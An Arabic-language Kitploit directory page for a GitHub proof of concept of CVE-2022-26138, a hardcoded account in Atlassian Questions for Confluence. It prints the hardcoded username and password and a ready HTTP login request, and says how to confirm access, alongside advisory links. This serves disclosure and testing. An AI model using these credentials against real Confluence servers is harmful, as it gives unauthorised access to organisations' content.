Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26138 — كلمة مرور مضمنة في Atlassian Questions (CVE-2022-26138) | Kitploit
أدوات/GitHubGitHub/alcaparra/cve-2022-26138
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubalcaparra/cve-2022-26138

CVE-2022-26138

كلمة مرور مضمنة في Atlassian Questions (CVE-2022-26138)

عرض المستودع
31103منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26138 POC

questions_cve

الوصف

root@kitploit:~
ينشئ تطبيق Atlassian Questions For Confluence الخاص بـ Confluence Server وData Center
حساب مستخدم في Confluence ضمن مجموعة confluence-users
باسم المستخدم disabledsystemuser وكلمة مرور مضمّنة. يمكن لمهاجم
عن بُعد غير مصادق يعرف كلمة المرور المضمّنة
استغلال ذلك لتسجيل الدخول إلى Confluence والوصول إلى جميع المحتويات المتاحة
لمستخدمي مجموعة confluence-users.
يتم إنشاء حساب المستخدم هذا عند تثبيت الإصدارات 2.7.34 و2.7.35 و3.0.2 من التطبيق.

POC

بيانات الاعتماد المضمّنة:

  • المستخدم: disabledsystemuser
  • كلمة المرور: disabled1system1user6708

الاستغلال

root@kitploit:~
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action

إذا أعاد الخادم التوجيه إلى /vulnerable.action، فإن بيانات الاعتماد صالحة.

من أين حصلت على بيانات الاعتماد؟

كانت بيانات الاعتماد المضمّنة موجودة بوضوح داخل ملفات jar الخاصة بالإضافة المتأثرة

https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar

المراجع

  • https://www.cvedetails.com/cve/CVE-2022-26138/
  • https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  • https://jira.atlassian.com/browse/CONFSERVER-79483
تنزيل الأداة